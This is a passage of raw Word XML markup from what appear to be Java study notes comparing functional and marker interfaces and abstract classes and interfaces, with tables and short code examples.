      </w:r>
    </w:p>
    <w:p w14:paraId="0074867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task = () -&gt; System.out.println("Task is running");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1156F4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run();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE7C202"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090AB25D"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exactly one abstract method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A695DA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contain multiple default or static methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373B58B1"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used with lambda expressions or method references.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC6439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ed using @FunctionalInterface annotation (optional, but recommended).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231C9230" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="009A5F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C9843">
          <v:rect id="_x0000_i1193" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A20FF1A"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4544"/>
        <w:gridCol w:w="4545"/>
      </w:tblGrid>
      <w:tr w:rsidR="009A5F77" w:rsidRPr="00CE4B95" w14:paraId="0F501950" w14:textId="77777777" w:rsidTr="008A20F6">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7EE73CBE"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8123CFD"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rker Interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3EBA620B"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9A5F77" w:rsidRPr="00CE4B95" w14:paraId="62789CE6" w14:textId="77777777" w:rsidTr="008A20F6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0EE7D9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6F88EE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no methods (empty interface).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7338BB5C"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exactly one abstract method.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009A5F77" w:rsidRPr="00CE4B95" w14:paraId="6A0072FF" w14:textId="77777777" w:rsidTr="008A20F6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="482813B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48976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a class with a special property or behavior.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68A05597"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represent a single operation that can be passed around and executed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009A5F77" w:rsidRPr="00CE4B95" w14:paraId="5C296CC6" w14:textId="77777777" w:rsidTr="008A20F6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E48851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2F2799A1"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methods.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D3D8524"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abstract method, can have multiple default/static methods.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009A5F77" w:rsidRPr="00CE4B95" w14:paraId="6D5FCA7E" w14:textId="77777777" w:rsidTr="008A20F6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C3ED8B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520C0CAA"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izable, Cloneable.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="334EB418"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Callable, Comparator.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009A5F77" w:rsidRPr="00CE4B95" w14:paraId="3F64F9ED" w14:textId="77777777" w:rsidTr="008A20F6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0EE83272"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CE3FD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es implementing the interface are recognized by the system for specific behavior.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="518D939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primarily in lambda expressions or method references.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009A5F77" w:rsidRPr="00CE4B95" w14:paraId="25B89710" w14:textId="77777777" w:rsidTr="008A20F6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1FD4D7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43622AB6"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nnotation required.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="280D6A6D"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annotated with @FunctionalInterface (optional).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="358814E2"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095F44C"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does not define any methods and is used to mark a class for specific behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C9EB6A"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contains exactly one abstract method and is used to represent a single operation, commonly used with lambda expressions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056C3B4E" w14:textId="747F1942" w:rsidR="00342FA5" w:rsidRPr="00CE4B9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4" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDC1CBF" w14:textId="08B6E351" w:rsidR="001D1EE4" w:rsidRPr="00CE4B95" w:rsidRDefault="00E268DE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="66" w:name="_Toc197867280"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00DD377C" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ifference between Abstract class and Interface? Explain with scenarios which one you will it be used with conditions</w:t>
      </w:r>
      <w:r w:rsidR="001D1EE4" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="66"/>
    </w:p>
    <w:p w14:paraId="7AA21DD4" w14:textId="7F2F2ACD" w:rsidR="002576DC" w:rsidRPr="00CE4B95" w:rsidRDefault="002576DC" w:rsidP="00E758B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AA1D1E">
          <v:rect id="_x0000_i1195" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D06181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2DD82BA3"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p w14:paraId="590EE5E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bstract class is a class that cannot be instantiated on its own and may contain both abstract (unimplemented) and concrete (implemented) methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B96B905"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have state (instance variables) and behaviors (methods) that can be inherited by subclasses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5044B016"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p w14:paraId="7624097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is a reference type, similar to a class, but it can only contain abstract methods (until Java 8, when default and static methods were introduced).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8C1363"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cannot contain state (instance variables) except for constants (static final variables).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD0B23B"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BDEE4">
          <v:rect id="_x0000_i1196" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="30523F2D"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976"/>
        <w:gridCol w:w="4772"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E758B7" w:rsidRPr="00CE4B95" w14:paraId="1C6E817A" w14:textId="77777777" w:rsidTr="002576DC">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E4E6E99"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F5C7D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D0037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489ECB83" w14:textId="77777777" w:rsidTr="002576DC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5669F1E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3971D0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implemented) methods.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E56F26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prior to Java 8). From Java 8 onwards, it can have default and static methods.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E758B7" w:rsidRPr="00CE4B95" w14:paraId="66093361" w14:textId="77777777" w:rsidTr="002576DC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0EF235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7D0907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5E7267E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constants (static final variables).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E758B7" w:rsidRPr="00CE4B95" w14:paraId="461AB61F" w14:textId="77777777" w:rsidTr="002576DC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A04F2F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7AEAE38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ny access modifier (public, private, protected, default).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="202853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are implicitly public. Variables are public static final.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E758B7" w:rsidRPr="00CE4B95" w14:paraId="52DCEEE5" w14:textId="77777777" w:rsidTr="002576DC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09C991F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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14F07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structors to initialize the state of an object.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6787769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constructors.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E758B7" w:rsidRPr="00CE4B95" w14:paraId="65D57C75" w14:textId="77777777" w:rsidTr="002576DC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00C5ACF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A888D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 due to single inheritance.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2396A8C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 allowing multiple inheritance of behavior.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E758B7" w:rsidRPr="00CE4B95" w14:paraId="47B4F94B" w14:textId="77777777" w:rsidTr="002576DC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A148E1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19CC0C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share common implementation but also have some specific behavior.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="459D89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different classes need to share common behavior but don't share a common implementation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E758B7" w:rsidRPr="00CE4B95" w14:paraId="51A0CA05" w14:textId="77777777" w:rsidTr="002576DC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04CC81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Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="347D8CC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subclasses using extends.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F8F90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classes using implements.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2073040D"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2A640">
          <v:rect id="_x0000_i1197" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="776F1F3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3305"/>
        <w:gridCol w:w="4228"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E758B7" w:rsidRPr="00CE4B95" w14:paraId="27D4DED2" w14:textId="77777777" w:rsidTr="002576DC">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D0D7F88"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E27CA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0D5742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358B6E04" w14:textId="77777777" w:rsidTr="002576DC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C74E70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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1BD0792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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27C46CB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r>
      <w:tr w:rsidR="00E758B7" w:rsidRPr="00CE4B95" w14:paraId="17A4B4B9" w14:textId="77777777" w:rsidTr="002576DC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4108588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 Implementation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="783850E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method implementations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2383F04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and static method implementations (Java 8+).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E758B7" w:rsidRPr="00CE4B95" w14:paraId="49887E4D" w14:textId="77777777" w:rsidTr="002576DC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24B5DF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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="703E624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244D6E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only abstract methods (before Java 8).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E758B7" w:rsidRPr="00CE4B95" w14:paraId="7AD359A8" w14:textId="77777777" w:rsidTr="002576DC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1462348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1685EF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only extend one abstract class.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B4B178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53333767" w14:textId="77777777" w:rsidTr="002576DC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19236F4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f extends/implements</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F70CA5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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="250F3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6DFA89B3" w14:textId="77777777" w:rsidTr="002576DC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6EE14D7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Instance Variables)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5465F9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672ABF5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bl>
    <w:p w14:paraId="3F817ADC"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09B6D">
          <v:rect id="_x0000_i1198" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="655313E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to Use Abstract Class vs Interface?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2E5C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e Abstract Class When:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70AFE728"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mmon functionality</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When you have a common base class that provides common functionality for all subclasses, but you also want to allow subclasses to override some of the behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2743DB6D"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When you want to provide shared state (instance variables) for subclasses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71459BAB"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If you need to provide default method implementation (which is common to all subclasses), you can use an abstract class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1671DC5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291FD5B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Vehicle {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EA50B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peed;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2026DE8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fuelLevel;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E330842" w14:textId="77777777" w:rsidR="002576DC" w:rsidRPr="00CE4B95" w:rsidRDefault="002576DC" w:rsidP="00E758B7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56D0761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bstract void accelerate();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164F06FB" w14:textId="77777777" w:rsidR="002576DC" w:rsidRPr="00CE4B95" w:rsidRDefault="002576DC" w:rsidP="00E758B7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70CB8E9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Engine() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2B2F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2FCADF5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E757F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65129" w14:textId="77777777" w:rsidR="002576DC" w:rsidRPr="00CE4B95" w:rsidRDefault="002576DC" w:rsidP="00E758B7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B044EB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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4D6F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8A8DBE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5107D7B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accelerating");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EC9D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5575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4F968" w14:textId="77777777" w:rsidR="002576DC" w:rsidRPr="00CE4B95" w:rsidRDefault="002576DC" w:rsidP="00E758B7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EE0B8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ke extends Vehicle {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E20C4F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A30E0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0023F4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ke accelerating");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5F9E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DBED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CF3FF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e Interface When:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D56B86"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If you want to decouple behavior from implementation and allow multiple unrelated classes to share the same behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26930F9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72CA78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ortable {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2210A5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rt();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A1E75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4DE2E" w14:textId="77777777" w:rsidR="002576DC" w:rsidRPr="00CE4B95" w:rsidRDefault="002576DC" w:rsidP="00E758B7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="783C62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lonable {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F888B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 clone();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7454884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DB375" w14:textId="77777777" w:rsidR="002576DC" w:rsidRPr="00CE4B95" w:rsidRDefault="002576DC" w:rsidP="00E758B7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44DA866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ortable, Clonable {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E63747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877B88C" w14:textId="77777777" w:rsidR="002576DC" w:rsidRPr="00CE4B95" w:rsidRDefault="002576DC" w:rsidP="00E758B7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43EF98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9CD22B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rt() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB983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orting person objects");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EA0DC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1F0FC9" w14:textId="77777777" w:rsidR="002576DC" w:rsidRPr="00CE4B95" w:rsidRDefault="002576DC" w:rsidP="00E758B7">
